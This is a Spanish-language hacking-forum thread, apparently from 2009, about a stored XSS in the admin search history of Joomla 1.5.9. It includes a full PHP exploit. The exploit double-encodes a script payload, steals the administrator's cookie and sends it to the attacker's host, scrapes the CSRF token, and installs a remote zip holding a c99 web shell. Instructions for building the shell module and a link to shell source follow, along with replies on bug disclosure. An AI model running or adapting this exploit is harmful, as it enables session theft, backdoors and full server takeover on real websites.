Un amigo por el mensajero me comentaba sobre algunas personas que se dedican a la programación que dicen "como es inexplotable no se parcha" y es entendible, si ves un bug que para ti es inexplotable lo mas probable es que no lo repares porque supuestamente no tiene ningún riesgo hasta que aparece la gente que si lo logra entonces recién lo reparan. En este caso creo que es similar ya que en el componente search dentro del panel de administración se puede ver el historial de busqueda y me llevé la sorpresa de que este no filtra ningún carácter y me pregunté.. "¿Porque??" entonces mejor comenzé a instalar joomla en mi localhost para ya no seguir desmadrando mi sitio  y pude comprobar que el componente Search de la portada o sea el que ve el visitante ya tiene un filtro el cual elimina todos los caácteres después del "<" por lo tanto pensando como el codeador "esto es inexplotable así que no nos preocupamos por mostrar el historial de busquedas en la administración poniendo ningún filtro", pero que pasa si logro evadir ese filtro? puedo comprometer al administrador? la respuesta es si y eso fue lo que sucedió.

Esto equivale a
Lo ponemos dentro de la caja del buscador y nos enviará directamente al formulario del buscador avanzado con esta busqueda sin ser filtrada, ahora cuando el joomla tiene petysurl activado lo hace via petición GET y no POST así que hay que doble encodear cada carácter, por ejemplo:
Con esto ya el administrador podrá ver en su hermoso historial su XSS:


Tamaño original: http://img443.imageshack.us/img443/9854/dibujo2zq7.png

Mientras tanto que aparece el parche o actualización de joomla puedes desactivar el historial del buscador.

Ya con todo esto como que estamos listos para crear nuestro exploit con token y todo, hacemos un php que lanze una petición POST al buscador y seguidamente lanzamos la redirección hacia el componente afectado para causar la ejecución arbitraria, luego el xss llamará a un archivo de javascript alojado en otro servidor que realizará las acciones y estas serán obtener el token de seguridad y agregar un nuevo superadministrador para nosotros, seguido por la creación de un componente con una shell c99 incrustada para ganar el acceso total al servidor y si es posible rootearlo dependiendo de la versión del mismo y el estado de seguridad que pueda tener.

Voy a ir preparando los archivos para explicar paso por paso como hacerlo. Hasta la prox.

Muy buen post WHK, la verdad es que siempre gusta testear los CMS más usados y conocer sus fallas.

Pero en último bug que publicaste (arriba de este post) nombras file disclosure, y yo no veo la existencia de esa vulnerabilidad. En todo caso PATH DISCLOSURE.

Que por cierto, en su día publique algo parecido para LOKICMS.

LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
http://milw0rm.com/exploits/6737


Saludos!!

jaja bueno ... a mi también me han rechazado más de un bug, pero esto se debe a que no se puede publicar cualquier fallo, ya que muchos carecen de importancia. En tu caso, con el bug de path disclosure yo lo veo lógico que no te lo publicaran ya que para poder explotarlo debes tener acceso al panel de admin, y desde luego con acceso al panel seguro que hay distintas formas de mirar el PATH completo de cms y muchas cosas más interesantes que esta. Sin embargo, si se pudiera llevar con éxito esa misma vulnerabilidad sin permisos de admin, estoy seguro de que lo publicarían.

Pero desde luego, como ejemplo para los aprendices es un estupendo PoC para testear.

Saludos!

Lo prometido es deuda..
Hize un video y un exploit pero que hace?, solamente haces que un usuario con derechos de administración visualiza este script para que se le suba automaticamente una shell c99 eso es todo y al finalizar el script te deja un log diciendote si falló o donde quedó finalemnte la shell.
Lo único que deben modificar es la ruta del paquete de joomla que contiene la shell (ya les mostraré como fabricarlo) y la ruta del sistema vulnerable.

<?php
error_reporting(0);
 
$EXPL['SITIO_VULNERABLE'] = 'http://127.0.0.1/joomla/'; // Web vulnerable
$EXPL['URL_COM_SHELL'] = 'http://201.223.24.232:81/mod_arkimest.zip'; // La shell
 
$EXPL['XSS'] = '<script '.
'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';
 
if($_GET['act'] == 'js'){
 die('
 // Acá tu laaaargo script
 
 var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
 function base64_encode(input){
  var output = "";
  var chr1, chr2, chr3;
  var enc1, enc2, enc3, enc4;
  var i = 0;
  do{
   chr1 = input.charCodeAt(i++);
   chr2 = input.charCodeAt(i++);
   chr3 = input.charCodeAt(i++);
   enc1 = chr1 >> 2;
   enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
   enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
   enc4 = chr3 & 63;
   if(isNaN(chr2)){
    enc3 = enc4 = 64;
   }else if(isNaN(chr3)){
    enc4 = 64;
   }
   output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
  }while(i < input.length);
  return output;
 }
 
 window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
');
 
}elseif($_GET['act'] == 'galletas'){
 if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>No hay galletas ni chocolates :(</strong>');
 $buffer = http_get($EXPL['SITIO_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
 $buscar = explode('hidden" name="', $buffer);
 foreach($buscar as $encontrado){
  $encontrado = explode('"', $encontrado);
  $encontrado = $encontrado[0];
  if(strlen($encontrado) == 32){
   $hash = $encontrado;
   break;
  }
 }
 $buffer = http_post(
  $EXPL['SITIO_VULNERABLE'].'/administrator/index.php', $cookies, 
  $hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
 );
 if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
  // Explotación ejecutada con éxito! la shell está en /modules/mod_artimesk/mod_artimesk.php
  header('Explotado-por: WHK');
  $explotado = true;
 }else{
  // La explotación ha fallado.
  $explotado = false;
 }
 if($archivo_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
  if($explotado){
   fwrite($archivo_handle, 'La shell ha sido obtenida exitosamente!. URL: '.$EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
   header('location: https://foro.elhacker.net/nivel_web/multiples_fallas_csrf_xss_directoindirecto_en_joomla_159-t244742.0.html');
  }else{
   fwrite($archivo_handle, 'El sitio '.$EXPL['SITIO_VULNERABLE'].' no pudo ser explotado debido a que la versión de joomla no es compatible o el administrador no tenía acceso a su rpopio sitio web.'."\x0D\x0A");
   header('location: http://noscript.net/');
  }
  fclose($archivo_handle);
 }
 exit($explotado);
}
 
// Ejecuta el código javascript arbitrario
$pedir = $EXPL['SITIO_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir, 'null[]=token')){
 header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
 die('hola :-s');
}
 
function http_post($url, $cookies, $postdata){
 $timeout = 100;
 $ch = curl_init($url);
 curl_setopt($ch, CURLOPT_POST, true);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
 curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
 curl_setopt($ch, CURLOPT_HEADER, true);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
 curl_setopt($ch, CURLOPT_COOKIE, $cookies);
 $contenido = curl_exec($ch);
 $error = curl_error($ch);
 curl_close($ch);
 if($contenido)
  return $contenido;
 else
   return $error;
}
 
function http_get($url, $cookies){
 $timeout = 100;
 $ch = curl_init($url);
 curl_setopt($ch, CURLOPT_POST, false);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
 curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
 curl_setopt($ch, CURLOPT_HEADER, true);
 curl_setopt($ch, CURLOPT_COOKIE, $cookies); 
 $contenido = curl_exec($ch);
 $error = curl_error($ch);
 curl_close($ch);
 if($contenido)
  return $contenido;
 else
   return $error;
}
 
?>

Como crear el Componente con la shell dentro?

mod_artimesk.xml

<?xml version="1.0" encoding="utf-8"?>
<install type="module" version="1.0.0">
	<name>WHK Arkimest</name>
	<author>WHK</author>
	<creationDate>March 2009</creationDate>
	<copyright>Copyright (C) WHK 2009. All rights reserved.</copyright>
	<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
	<authorEmail>www.kernel32@gmail.com</authorEmail>
	<authorUrl>foro.elhacker.net</authorUrl>
	<version>1.0.0</version>
	<description>Artimesk</description>
	<files>
	 <filename module="mod_artimesk">mod_artimesk.php</filename>
	</files>
</install>
 

Donde dice "mod_artimesk.php" es el archivo que lleva la shell.

mod_artimesk.php

<?php /* acá mi shell */ ?>

Puedes poner lo que quieras o puedes usar directamente una shell c99 renombrada a mod_artimesk.php tal como esta: http://www.geocities.com/zkizzik/c99.txt

Toma esos dos archivos y guardalo en zip y ya tienes tu módulo shell para joomla ^^

VIDEO


Ver video en tamaño completo:
http://lab.jccharry.com/joomla/xss2shell159/

Me ha llegado un correo desde Joomlacode.org y al parecer si les ha dolido un poco el video porque acaban de reabrir el tema que les habia enviado en el tracker donde exponía todo esto, al parecer en ese entonces no le dieron para nada importancia ya que hasta lo habian cerrado pero ahora después del video lo acaban de reabrir sin acceso a la totalidad del público y lo clasificaron como alto impacto XD


El tracker está acá
http://joomlacode.org/gf/project/jsecurity/tracker/?action=TrackerItemEdit&tracker_id=7925&tracker_item_id=15065
tal como lo dice el correo pero al ingresar me deniega el acceso 

Por lo menos ahora si van a  pensar en repararlo.